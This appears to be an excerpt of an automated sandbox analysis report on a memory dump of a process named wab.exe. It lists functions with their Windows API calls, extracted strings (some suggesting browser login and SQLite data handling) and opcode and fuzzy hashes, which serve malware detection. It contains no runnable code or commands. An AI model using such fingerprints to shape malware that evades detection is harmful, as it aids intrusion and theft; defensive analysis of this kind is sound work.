                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                  • API String ID: 3510742995-3273207271
                  • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                  • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                  • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                  • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                  Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                  Download Yara Rule
                  APIs
                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                  • memset.MSVCRT ref: 00413ADC
                  • memset.MSVCRT ref: 00413AEC
                    • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                  • memset.MSVCRT ref: 00413BD7
                  • wcscpy.MSVCRT ref: 00413BF8
                  • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                  • String ID: 3A
                  • API String ID: 3300951397-293699754
                  • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                  • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                  • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                  • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                  Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                  • wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                  • wcslen.MSVCRT ref: 0040D1D3
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                  • memcpy.MSVCRT ref: 0040D24C
                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                  • String ID: strings
                  • API String ID: 3166385802-3030018805
                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                  Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00411AF6
                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                  • wcsrchr.MSVCRT ref: 00411B14
                  • wcscat.MSVCRT ref: 00411B2E
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileModuleNamememsetwcscatwcsrchr
                  • String ID: AE$.cfg$General$EA
                  • API String ID: 776488737-1622828088
                  • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                  • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                  • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                  • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                  Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040D8BD
                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                  • memset.MSVCRT ref: 0040D906
                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                  • _wcsicmp.MSVCRT ref: 0040D92F
                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                  • String ID: sysdatetimepick32
                  • API String ID: 1028950076-4169760276
                  • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                  • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                  Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: -journal$-wal
                  • API String ID: 438689982-2894717839
                  • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                  • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                  Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                  • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                  • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                  • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                  • EndDialog.USER32(?,00000002), ref: 00405C83
                  • EndDialog.USER32(?,00000001), ref: 00405C98
                    • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                    • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                  • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Item$Dialog$MessageSend
                  • String ID:
                  • API String ID: 3975816621-0
                  • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                  • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                  • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                  • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                  Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                  Download Yara Rule
                  APIs
                  • _wcsicmp.MSVCRT ref: 00444D09
                  • _wcsicmp.MSVCRT ref: 00444D1E
                  • _wcsicmp.MSVCRT ref: 00444D33
                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp$wcslen$_memicmp
                  • String ID: .save$http://$https://$log profile$signIn
                  • API String ID: 1214746602-2708368587
                  • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                  • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                  • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                  • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                  Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                  • String ID:
                  • API String ID: 2313361498-0
                  • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                  • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                  • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                  • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                  Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetClientRect.USER32(?,?), ref: 00405F65
                  • GetWindow.USER32(?,00000005), ref: 00405F7D
                  • GetWindow.USER32(00000000), ref: 00405F80
                    • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                  • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                  • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                  • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$ItemMessageRectSend$Client
                  • String ID:
                  • API String ID: 2047574939-0
                  • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                  • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                  • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                  • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                  Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                  • String ID:
                  • API String ID: 4218492932-0
                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                  Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                  • memcpy.MSVCRT ref: 0044A8BF
                  • memcpy.MSVCRT ref: 0044A90C
                  • memcpy.MSVCRT ref: 0044A988
                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                  • memcpy.MSVCRT ref: 0044A9D8
                  • memcpy.MSVCRT ref: 0044AA19
                  • memcpy.MSVCRT ref: 0044AA4A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: gj
                  • API String ID: 438689982-4203073231
                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                  Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                  • API String ID: 3510742995-2446657581
                  • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                  • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                  • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                  • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                  Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                  • memset.MSVCRT ref: 00405ABB
                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                  • SetFocus.USER32(?), ref: 00405B76
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$FocusItemmemset
                  • String ID:
                  • API String ID: 4281309102-0
                  • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                  • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                  • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                  • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                  Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintfwcscat
                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                  • API String ID: 384018552-4153097237
                  • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                  • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                  • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                  • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                  Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ItemMenu$CountInfomemsetwcschr
                  • String ID: 0$6
                  • API String ID: 2029023288-3849865405
                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                  Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                  • memset.MSVCRT ref: 00405455
                  • memset.MSVCRT ref: 0040546C
                  • memset.MSVCRT ref: 00405483
                  • memcpy.MSVCRT ref: 00405498
                  • memcpy.MSVCRT ref: 004054AD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$memcpy$ErrorLast
                  • String ID: 6$\
                  • API String ID: 404372293-1284684873
                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                  Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                  Download Yara Rule
                  APIs
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                  • wcscpy.MSVCRT ref: 0040A0D9
                  • wcscat.MSVCRT ref: 0040A0E6
                  • wcscat.MSVCRT ref: 0040A0F5
                  • wcscpy.MSVCRT ref: 0040A107
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                  • String ID:
                  • API String ID: 1331804452-0
                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                  Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                  • String ID: advapi32.dll
                  • API String ID: 2012295524-4050573280
                  • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                  • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                  Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • <%s>, xrefs: 004100A6
                  • <?xml version="1.0" ?>, xrefs: 0041007C
                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_snwprintf
                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                  • API String ID: 3473751417-2880344631
                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                  Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscat$_snwprintfmemset
                  • String ID: %2.2X
                  • API String ID: 2521778956-791839006
                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                  Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _snwprintfwcscpy
                  • String ID: dialog_%d$general$menu_%d$strings
                  • API String ID: 999028693-502967061
                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                  Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memsetstrlen
                  • String ID:
                  • API String ID: 2350177629-0
                  • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                  • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                  • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                  • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                  Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                  • API String ID: 2221118986-1606337402
